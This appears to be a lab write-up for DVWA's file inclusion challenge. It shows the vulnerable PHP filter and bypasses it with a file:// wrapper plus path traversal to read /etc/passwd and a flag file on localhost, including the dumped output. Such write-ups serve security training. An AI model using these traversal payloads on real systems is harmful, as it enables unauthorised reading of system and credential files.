### Objective

Read all five famous quotes from '[../hackable/flags/fi.php](http://localhost:5000/hackable/flags/fi.php)' using only the file inclusion.

Let's try something first.
```html
http://127.0.0.1:5000/vulnerabilities/fi/?page=index.php
```
Response
```txt
ERROR: File not found!
```
Looks like it's checking for a file? Let's view the source.
```php
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>  

```
Looking up fnmatch is a Unix filename pattern matching.
So we have to work out with the if expression, We can't do anything to the later part. So let's try looking up at PayloadsAllTheThings. 
I stumbled upon wrappers, and thought perhaps there is a file wrapper? Since we do need to have 'file' in our payload. So I looked up and there is!
```php
file:// — Accessing local filesystem
```
So let's make a Proof of Concept first.
```html
http://127.0.0.1:5000/vulnerabilities/fi/?page=file:///../../../../../../../etc/passwd
```
And response should be :
```txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

```
Looks like we can do it.
Let's read fi.php
```html
http://127.0.0.1:5000/vulnerabilities/fi/?page=file:///../../../../../../../var/www/html/hackable/flags/fi.php
```
And we should get it.




